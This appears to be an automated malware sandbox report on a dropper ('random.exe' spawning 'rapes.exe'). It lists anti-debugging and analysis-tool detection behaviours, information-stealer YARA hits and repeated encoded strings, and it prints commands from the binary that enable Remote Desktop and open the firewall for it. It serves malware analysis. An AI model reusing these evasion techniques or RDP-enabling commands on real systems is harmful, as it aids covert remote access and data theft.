            Source: random.exe, 00000000.00000002.1269151253.0000000000827000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000002.00000002.1297950338.0000000000DE7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: C:\Users\user\Desktop\random.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\random.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: NTICE
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SICE
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_04A703A7 rdtsc 0_2_04A703A7
            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
            Source: random.exe, random.exe, 00000000.00000002.1269151253.0000000000827000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, rapes.exe, 00000002.00000002.1297950338.0000000000DE7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 3Program Manager
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10362200101\aae6fb6455.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10362200101\aae6fb6455.exe VolumeInformationJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1297857996.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.1257661877.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.1763027264.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1268903433.0000000000631000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: random.exeString found in binary or memory: net start termservice
            Source: random.exe, 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
            Source: random.exe, 00000000.00000003.1227824181.0000000004850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
            Source: random.exe, 00000000.00000002.1268903433.0000000000631000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
            Source: random.exe, 00000000.00000002.1268903433.0000000000631000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
            Source: rapes.exeString found in binary or memory: net start termservice
            Source: rapes.exe, 00000002.00000002.1297857996.0000000000BF1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: net start termservice
            Source: rapes.exe, 00000002.00000002.1297857996.0000000000BF1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
            Source: rapes.exe, 00000002.00000003.1257661877.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
            Source: rapes.exe, 00000002.00000003.1257661877.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
            Source: rapes.exe, 0000000A.00000003.1763027264.0000000004A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
            Source: rapes.exe, 0000000A.00000003.1763027264.0000000004A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB 